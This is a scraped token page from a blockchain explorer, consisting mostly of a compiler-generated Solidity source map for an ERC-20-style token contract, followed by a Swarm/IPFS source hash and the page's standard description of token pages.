;4019:125;;;:::o;2510:101:0:-;1780:13;:11;:13::i;:::-;2574:30:::1;2601:1;2574:18;:30::i;:::-;2510:101::o:0;9214:300:1:-;9333:9;9328:180;9352:11;;:18;;9348:1;:22;9328:180;;;9426:11;;9438:1;9426:14;;;;;;;:::i;:::-;;;;;;;;;;;;;;;:::i;:::-;9396:45;;9401:6;9396:45;;;9409:1;9412:3;9417:4;9423:1;9396:45;;;;;;;;;:::i;:::-;;;;;;;;9485:6;;;;;;;;;;;9460:37;;9469:11;;9481:1;9469:14;;;;;;;:::i;:::-;;;;;;;;;;;;;;;:::i;:::-;9460:37;;;9493:3;9460:37;;;;;;:::i;:::-;;;;;;;;9372:3;;;;;:::i;:::-;;;;9328:180;;;;9214:300;;;;;:::o;1887:85:0:-;1933:7;1959:6;;;;;;;;;;;1952:13;;1887:85;:::o;2463:102:1:-;2519:13;2551:7;2544:14;;;;;:::i;:::-;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;:::i;:::-;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;2463:102;:::o;3286:195::-;1780:13:0;:11;:13::i;:::-;3375:9:1::1;3370:105;3394:11;;:18;;3390:1;:22;3370:105;;;3460:4;3433:8;:24;3442:11;;3454:1;3442:14;;;;;;;:::i;:::-;;;;;;;;;;;;;;;:::i;:::-;3433:24;;;;;;;;;;;;;;;;:31;;;;;;;;;;;;;;;;;;3414:3;;;;;:::i;:::-;;;;3370:105;;;;3286:195:::0;;:::o;9791:62::-;1780:13:0;:11;:13::i;:::-;9850:1:1::1;9841:6;;:10;;;;;;;;;;;;;;;;;;9791:62:::0;:::o;7205:427::-;7298:4;7314:13;7330:12;:10;:12::i;:::-;7314:28;;7352:24;7379:25;7389:5;7396:7;7379:9;:25::i;:::-;7352:52;;7442:15;7422:16;:35;;7414:85;;;;;;;;;;;;:::i;:::-;;;;;;;;;7533:60;7542:5;7549:7;7577:15;7558:16;:34;7533:8;:60::i;:::-;7621:4;7614:11;;;;7205:427;;;;:::o;4340:189::-;4419:4;4435:13;4451:12;:10;:12::i;:::-;4435:28;;4473;4483:5;4490:2;4494:6;4473:9;:28::i;:::-;4518:4;4511:11;;;4340:189;;;;:::o;4587:149::-;4676:7;4702:11;:18;4714:5;4702:18;;;;;;;;;;;;;;;:27;4721:7;4702:27;;;;;;;;;;;;;;;;4695:34;;4587:149;;;;:::o;2760:198:0:-;1780:13;:11;:13::i;:::-;2868:1:::1;2848:22;;:8;:22;;::::0;2840:73:::1;;;;;;;;;;;;:::i;:::-;;;;;;;;;2923:28;2942:8;2923:18;:28::i;:::-;2760:198:::0;:::o;640:96::-;693:7;719:10;712:17;;640:96;:::o;12132:370:1:-;12280:1;12263:19;;:5;:19;;;12255:68;;;;;;;;;;;;:::i;:::-;;;;;;;;;12360:1;12341:21;;:7;:21;;;12333:68;;;;;;;;;;;;:::i;:::-;;;;;;;;;12442:6;12412:11;:18;12424:5;12412:18;;;;;;;;;;;;;;;:27;12431:7;12412:27;;;;;;;;;;;;;;;:36;;;;12479:7;12463:32;;12472:5;12463:32;;;12488:6;12463:32;;;;;;:::i;:::-;;;;;;;;12132:370;;;:::o;12783:441::-;12913:24;12940:25;12950:5;12957:7;12940:9;:25::i;:::-;12913:52;;12999:17;12979:16;:37;12975:243;;13060:6;13040:16;:26;;13032:68;;;;;;;;;;;;:::i;:::-;;;;;;;;;13142:51;13151:5;13158:7;13186:6;13167:16;:25;13142:8;:51::i;:::-;12975:243;12903:321;12783:441;;;:::o;8086:818::-;8228:1;8212:18;;:4;:18;;;8204:68;;;;;;;;;;;;:::i;:::-;;;;;;;;;8304:1;8290:16;;:2;:16;;;8282:64;;;;;;;;;;;;:::i;:::-;;;;;;;;;8357:38;8378:4;8384:2;8388:6;8357:20;:38::i;:::-;8406:19;8428:9;:15;8438:4;8428:15;;;;;;;;;;;;;;;;8406:37;;8476:6;8461:11;:21;;8453:72;;;;;;;;;;;;:::i;:::-;;;;;;;;;8591:6;8577:11;:20;8559:9;:15;8569:4;8559:15;;;;;;;;;;;;;;;:38;;;;8791:6;8774:9;:13;8784:2;8774:13;;;;;;;;;;;;;;;;:23;;;;;;;;;;;8838:2;8823:26;;8832:4;8823:26;;;8842:6;8823:26;;;;;;:::i;:::-;;;;;;;;8860:37;8880:4;8886:2;8890:6;8860:19;:37::i;:::-;8194:710;8086:818;;;:::o;2045:130:0:-;2119:12;:10;:12::i;:::-;2108:23;;:7;:5;:7::i;:::-;:23;;;2100:68;;;;;;;;;;;;:::i;:::-;;;;;;;;;2045:130::o;3112:187::-;3185:16;3204:6;;;;;;;;;;;3185:25;;3229:8;3220:6;;:17;;;;;;;;;;;;;;;;;;3283:8;3252:40;;3273:8;3252:40;;;;;;;;;;;;3175:124;3112:187;:::o;13808:121:1:-;;;;:::o;14517:195::-;14642:8;:12;14651:2;14642:12;;;;;;;;;;;;;;;;;;;;;;;;;:30;;;;14658:8;:14;14667:4;14658:14;;;;;;;;;;;;;;;;;;;;;;;;;14642:30;14638:72;;;14701:4;14682:23;;:15;;;;;;;;;;;:23;;;14674:36;;;;;;;;;;;;:::i;:::-;;;;;;;;;14638:72;14517:195;;;:::o;7:99:5:-;59:6;93:5;87:12;77:22;;7:99;;;:::o;112:169::-;196:11;230:6;225:3;218:19;270:4;265:3;261:14;246:29;;112:169;;;;:::o;287:246::-;368:1;378:113;392:6;389:1;386:13;378:113;;;477:1;472:3;468:11;462:18;458:1;453:3;449:11;442:39;414:2;411:1;407:10;402:15;;378:113;;;525:1;516:6;511:3;507:16;500:27;349:184;287:246;;;:::o;539:102::-;580:6;631:2;627:7;622:2;615:5;611:14;607:28;597:38;;539:102;;;:::o;647:377::-;735:3;763:39;796:5;763:39;:::i;:::-;818:71;882:6;877:3;818:71;:::i;:::-;811:78;;898:65;956:6;951:3;944:4;937:5;933:16;898:65;:::i;:::-;988:29;1010:6;988:29;:::i;:::-;983:3;979:39;972:46;;739:285;647:377;;;;:::o;1030:313::-;1143:4;1181:2;1170:9;1166:18;1158:26;;1230:9;1224:4;1220:20;1216:1;1205:9;1201:17;1194:47;1258:78;1331:4;1322:6;1258:78;:::i;:::-;1250:86;;1030:313;;;;:::o;1430:117::-;1539:1;1536;1529:12;1553:117;1662:1;1659;1652:12;1676:126;1713:7;1753:42;1746:5;1742:54;1731:65;;1676:126;;;:::o;1808:96::-;1845:7;1874:24;1892:5;1874:24;:::i;:::-;1863:35;;1808:96;;;:::o;1910:122::-;1983:24;2001:5;1983:24;:::i;:::-;1976:5;1973:35;1963:63;;2022:1;2019;2012:12;1963:63;1910:122;:::o;2038:139::-;2084:5;2122:6;2109:20;2100:29;;2138:33;2165:5;2138:33;:::i;:::-;2038:139;;;;:::o;2183:77::-;2220:7;2249:5;2238:16;;2183:77;;;:::o;2266:122::-;2339:24;2357:5;2339:24;:::i;:::-;2332:5;2329:35;2319:63;;2378:1;2375;2368:12;2319:63;2266:122;:::o;2394:139::-;2440:5;2478:6;2465:20;2456:29;;2494:33;2521:5;2494:33;:::i;:::-;2394:139;;;;:::o;2539:474::-;2607:6;2615;2664:2;2652:9;2643:7;2639:23;2635:32;2632:119;;;2670:79;;:::i;:::-;2632:119;2790:1;2815:53;2860:7;2851:6;2840:9;2836:22;2815:53;:::i;:::-;2805:63;;2761:117;2917:2;2943:53;2988:7;2979:6;2968:9;2964:22;2943:53;:::i;:::-;2933:63;;2888:118;2539:474;;;;;:::o;3019:90::-;3053:7;3096:5;3089:13;3082:21;3071:32;;3019:90;;;:::o;3115:109::-;3196:21;3211:5;3196:21;:::i;:::-;3191:3;3184:34;3115:109;;:::o;3230:210::-;3317:4;3355:2;3344:9;3340:18;3332:26;;3368:65;3430:1;3419:9;3415:17;3406:6;3368:65;:::i;:::-;3230:210;;;;:::o;3446:118::-;3533:24;3551:5;3533:24;:::i;:::-;3528:3;3521:37;3446:118;;:::o;3570:222::-;3663:4;3701:2;3690:9;3686:18;3678:26;;3714:71;3782:1;3771:9;3767:17;3758:6;3714:71;:::i;:::-;3570:222;;;;:::o;3798:619::-;3875:6;3883;3891;3940:2;3928:9;3919:7;3915:23;3911:32;3908:119;;;3946:79;;:::i;:::-;3908:119;4066:1;4091:53;4136:7;4127:6;4116:9;4112:22;4091:53;:::i;:::-;4081:63;;4037:117;4193:2;4219:53;4264:7;4255:6;4244:9;4240:22;4219:53;:::i;:::-;4209:63;;4164:118;4321:2;4347:53;4392:7;4383:6;4372:9;4368:22;4347:53;:::i;:::-;4337:63;;4292:118;3798:619;;;;;:::o;4423:86::-;4458:7;4498:4;4491:5;4487:16;4476:27;;4423:86;;;:::o;4515:112::-;4598:22;4614:5;4598:22;:::i;:::-;4593:3;4586:35;4515:112;;:::o;4633:214::-;4722:4;4760:2;4749:9;4745:18;4737:26;;4773:67;4837:1;4826:9;4822:17;4813:6;4773:67;:::i;:::-;4633:214;;;;:::o;4853:329::-;4912:6;4961:2;4949:9;4940:7;4936:23;4932:32;4929:119;;;4967:79;;:::i;:::-;4929:119;5087:1;5112:53;5157:7;5148:6;5137:9;5133:22;5112:53;:::i;:::-;5102:63;;5058:117;4853:329;;;;:::o;5188:117::-;5297:1;5294;5287:12;5311:117;5420:1;5417;5410:12;5434:117;5543:1;5540;5533:12;5574:568;5647:8;5657:6;5707:3;5700:4;5692:6;5688:17;5684:27;5674:122;;5715:79;;:::i;:::-;5674:122;5828:6;5815:20;5805:30;;5858:18;5850:6;5847:30;5844:117;;;5880:79;;:::i;:::-;5844:117;5994:4;5986:6;5982:17;5970:29;;6048:3;6040:4;6032:6;6028:17;6018:8;6014:32;6011:41;6008:128;;;6055:79;;:::i;:::-;6008:128;5574:568;;;;;:::o;6148:559::-;6234:6;6242;6291:2;6279:9;6270:7;6266:23;6262:32;6259:119;;;6297:79;;:::i;:::-;6259:119;6445:1;6434:9;6430:17;6417:31;6475:18;6467:6;6464:30;6461:117;;;6497:79;;:::i;:::-;6461:117;6610:80;6682:7;6673:6;6662:9;6658:22;6610:80;:::i;:::-;6592:98;;;;6388:312;6148:559;;;;;:::o;6713:995::-;6826:6;6834;6842;6850;6858;6907:3;6895:9;6886:7;6882:23;6878:33;6875:120;;;6914:79;;:::i;:::-;6875:120;7034:1;7059:53;7104:7;7095:6;7084:9;7080:22;7059:53;:::i;:::-;7049:63;;7005:117;7189:2;7178:9;7174:18;7161:32;7220:18;7212:6;7209:30;7206:117;;;7242:79;;:::i;:::-;7206:117;7355:80;7427:7;7418:6;7407:9;7403:22;7355:80;:::i;:::-;7337:98;;;;7132:313;7484:2;7510:53;7555:7;7546:6;7535:9;7531:22;7510:53;:::i;:::-;7500:63;;7455:118;7612:2;7638:53;7683:7;7674:6;7663:9;7659:22;7638:53;:::i;:::-;7628:63;;7583:118;6713:995;;;;;;;;:::o;7714:118::-;7801:24;7819:5;7801:24;:::i;:::-;7796:3;7789:37;7714:118;;:::o;7838:222::-;7931:4;7969:2;7958:9;7954:18;7946:26;;7982:71;8050:1;8039:9;8035:17;8026:6;7982:71;:::i;:::-;7838:222;;;;:::o;8066:474::-;8134:6;8142;8191:2;8179:9;8170:7;8166:23;8162:32;8159:119;;;8197:79;;:::i;:::-;8159:119;8317:1;8342:53;8387:7;8378:6;8367:9;8363:22;8342:53;:::i;:::-;8332:63;;8288:117;8444:2;8470:53;8515:7;8506:6;8495:9;8491:22;8470:53;:::i;:::-;8460:63;;8415:118;8066:474;;;;;:::o;8546:180::-;8594:77;8591:1;8584:88;8691:4;8688:1;8681:15;8715:4;8712:1;8705:15;8732:320;8776:6;8813:1;8807:4;8803:12;8793:22;;8860:1;8854:4;8850:12;8881:18;8871:81;;8937:4;8929:6;8925:17;8915:27;;8871:81;8999:2;8991:6;8988:14;8968:18;8965:38;8962:84;;9018:18;;:::i;:::-;8962:84;8783:269;8732:320;;;:::o;9058:180::-;9106:77;9103:1;9096:88;9203:4;9200:1;9193:15;9227:4;9224:1;9217:15;9244:191;9284:3;9303:20;9321:1;9303:20;:::i;:::-;9298:25;;9337:20;9355:1;9337:20;:::i;:::-;9332:25;;9380:1;9377;9373:9;9366:16;;9401:3;9398:1;9395:10;9392:36;;;9408:18;;:::i;:::-;9392:36;9244:191;;;;:::o;9441:180::-;9489:77;9486:1;9479:88;9586:4;9583:1;9576:15;9610:4;9607:1;9600:15;9627:233;9666:3;9689:24;9707:5;9689:24;:::i;:::-;9680:33;;9735:66;9728:5;9725:77;9722:103;;9805:18;;:::i;:::-;9722:103;9852:1;9845:5;9841:13;9834:20;;9627:233;;;:::o;9866:85::-;9911:7;9940:5;9929:16;;9866:85;;;:::o;9957:60::-;9985:3;10006:5;9999:12;;9957:60;;;:::o;10023:158::-;10081:9;10114:61;10132:42;10141:32;10167:5;10141:32;:::i;:::-;10132:42;:::i;:::-;10114:61;:::i;:::-;10101:74;;10023:158;;;:::o;10187:147::-;10282:45;10321:5;10282:45;:::i;:::-;10277:3;10270:58;10187:147;;:::o;10340:585::-;10533:4;10571:3;10560:9;10556:19;10548:27;;10585:71;10653:1;10642:9;10638:17;10629:6;10585:71;:::i;:::-;10666:80;10742:2;10731:9;10727:18;10718:6;10666:80;:::i;:::-;10756;10832:2;10821:9;10817:18;10808:6;10756:80;:::i;:::-;10846:72;10914:2;10903:9;10899:18;10890:6;10846:72;:::i;:::-;10340:585;;;;;;;:::o;10931:::-;11124:4;11162:3;11151:9;11147:19;11139:27;;11176:79;11252:1;11241:9;11237:17;11228:6;11176:79;:::i;:::-;11265:72;11333:2;11322:9;11318:18;11309:6;11265:72;:::i;:::-;11347;11415:2;11404:9;11400:18;11391:6;11347:72;:::i;:::-;11429:80;11505:2;11494:9;11490:18;11481:6;11429:80;:::i;:::-;10931:585;;;;;;;:::o;11522:224::-;11662:34;11658:1;11650:6;11646:14;11639:58;11731:7;11726:2;11718:6;11714:15;11707:32;11522:224;:::o;11752:366::-;11894:3;11915:67;11979:2;11974:3;11915:67;:::i;:::-;11908:74;;11991:93;12080:3;11991:93;:::i;:::-;12109:2;12104:3;12100:12;12093:19;;11752:366;;;:::o;12124:419::-;12290:4;12328:2;12317:9;12313:18;12305:26;;12377:9;12371:4;12367:20;12363:1;12352:9;12348:17;12341:47;12405:131;12531:4;12405:131;:::i;:::-;12397:139;;12124:419;;;:::o;12549:225::-;12689:34;12685:1;12677:6;12673:14;12666:58;12758:8;12753:2;12745:6;12741:15;12734:33;12549:225;:::o;12780:366::-;12922:3;12943:67;13007:2;13002:3;12943:67;:::i;:::-;12936:74;;13019:93;13108:3;13019:93;:::i;:::-;13137:2;13132:3;13128:12;13121:19;;12780:366;;;:::o;13152:419::-;13318:4;13356:2;13345:9;13341:18;13333:26;;13405:9;13399:4;13395:20;13391:1;13380:9;13376:17;13369:47;13433:131;13559:4;13433:131;:::i;:::-;13425:139;;13152:419;;;:::o;13577:223::-;13717:34;13713:1;13705:6;13701:14;13694:58;13786:6;13781:2;13773:6;13769:15;13762:31;13577:223;:::o;13806:366::-;13948:3;13969:67;14033:2;14028:3;13969:67;:::i;:::-;13962:74;;14045:93;14134:3;14045:93;:::i;:::-;14163:2;14158:3;14154:12;14147:19;;13806:366;;;:::o;14178:419::-;14344:4;14382:2;14371:9;14367:18;14359:26;;14431:9;14425:4;14421:20;14417:1;14406:9;14402:17;14395:47;14459:131;14585:4;14459:131;:::i;:::-;14451:139;;14178:419;;;:::o;14603:221::-;14743:34;14739:1;14731:6;14727:14;14720:58;14812:4;14807:2;14799:6;14795:15;14788:29;14603:221;:::o;14830:366::-;14972:3;14993:67;15057:2;15052:3;14993:67;:::i;:::-;14986:74;;15069:93;15158:3;15069:93;:::i;:::-;15187:2;15182:3;15178:12;15171:19;;14830:366;;;:::o;15202:419::-;15368:4;15406:2;15395:9;15391:18;15383:26;;15455:9;15449:4;15445:20;15441:1;15430:9;15426:17;15419:47;15483:131;15609:4;15483:131;:::i;:::-;15475:139;;15202:419;;;:::o;15627:179::-;15767:31;15763:1;15755:6;15751:14;15744:55;15627:179;:::o;15812:366::-;15954:3;15975:67;16039:2;16034:3;15975:67;:::i;:::-;15968:74;;16051:93;16140:3;16051:93;:::i;:::-;16169:2;16164:3;16160:12;16153:19;;15812:366;;;:::o;16184:419::-;16350:4;16388:2;16377:9;16373:18;16365:26;;16437:9;16431:4;16427:20;16423:1;16412:9;16408:17;16401:47;16465:131;16591:4;16465:131;:::i;:::-;16457:139;;16184:419;;;:::o;16609:224::-;16749:34;16745:1;16737:6;16733:14;16726:58;16818:7;16813:2;16805:6;16801:15;16794:32;16609:224;:::o;16839:366::-;16981:3;17002:67;17066:2;17061:3;17002:67;:::i;:::-;16995:74;;17078:93;17167:3;17078:93;:::i;:::-;17196:2;17191:3;17187:12;17180:19;;16839:366;;;:::o;17211:419::-;17377:4;17415:2;17404:9;17400:18;17392:26;;17464:9;17458:4;17454:20;17450:1;17439:9;17435:17;17428:47;17492:131;17618:4;17492:131;:::i;:::-;17484:139;;17211:419;;;:::o;17636:222::-;17776:34;17772:1;17764:6;17760:14;17753:58;17845:5;17840:2;17832:6;17828:15;17821:30;17636:222;:::o;17864:366::-;18006:3;18027:67;18091:2;18086:3;18027:67;:::i;:::-;18020:74;;18103:93;18192:3;18103:93;:::i;:::-;18221:2;18216:3;18212:12;18205:19;;17864:366;;;:::o;18236:419::-;18402:4;18440:2;18429:9;18425:18;18417:26;;18489:9;18483:4;18479:20;18475:1;18464:9;18460:17;18453:47;18517:131;18643:4;18517:131;:::i;:::-;18509:139;;18236:419;;;:::o;18661:225::-;18801:34;18797:1;18789:6;18785:14;18778:58;18870:8;18865:2;18857:6;18853:15;18846:33;18661:225;:::o;18892:366::-;19034:3;19055:67;19119:2;19114:3;19055:67;:::i;:::-;19048:74;;19131:93;19220:3;19131:93;:::i;:::-;19249:2;19244:3;19240:12;19233:19;;18892:366;;;:::o;19264:419::-;19430:4;19468:2;19457:9;19453:18;19445:26;;19517:9;19511:4;19507:20;19503:1;19492:9;19488:17;19481:47;19545:131;19671:4;19545:131;:::i;:::-;19537:139;;19264:419;;;:::o;19689:182::-;19829:34;19825:1;19817:6;19813:14;19806:58;19689:182;:::o;19877:366::-;20019:3;20040:67;20104:2;20099:3;20040:67;:::i;:::-;20033:74;;20116:93;20205:3;20116:93;:::i;:::-;20234:2;20229:3;20225:12;20218:19;;19877:366;;;:::o;20249:419::-;20415:4;20453:2;20442:9;20438:18;20430:26;;20502:9;20496:4;20492:20;20488:1;20477:9;20473:17;20466:47;20530:131;20656:4;20530:131;:::i;:::-;20522:139;;20249:419;;;:::o;20674:114::-;;:::o;20794:364::-;20936:3;20957:66;21021:1;21016:3;20957:66;:::i;:::-;20950:73;;21032:93;21121:3;21032:93;:::i;:::-;21150:1;21145:3;21141:11;21134:18;;20794:364;;;:::o;21164:419::-;21330:4;21368:2;21357:9;21353:18;21345:26;;21417:9;21411:4;21407:20;21403:1;21392:9;21388:17;21381:47;21445:131;21571:4;21445:131;:::i;:::-;21437:139;;21164:419;;;:::o

Swarm Source

ipfs://7d81bb21e8d3138f2249752dca2f8b0059c4cbb57d134516db1babc1dc9c4ca1
Loading...
Loading
Loading...
Loading
[ Download: CSV Export  ]
[ Download: CSV Export  ]

A token is a representation of an on-chain or off-chain asset. The token page shows information such as price, total supply, holders, transfers and social links. Learn more about this page in our Knowledge Base.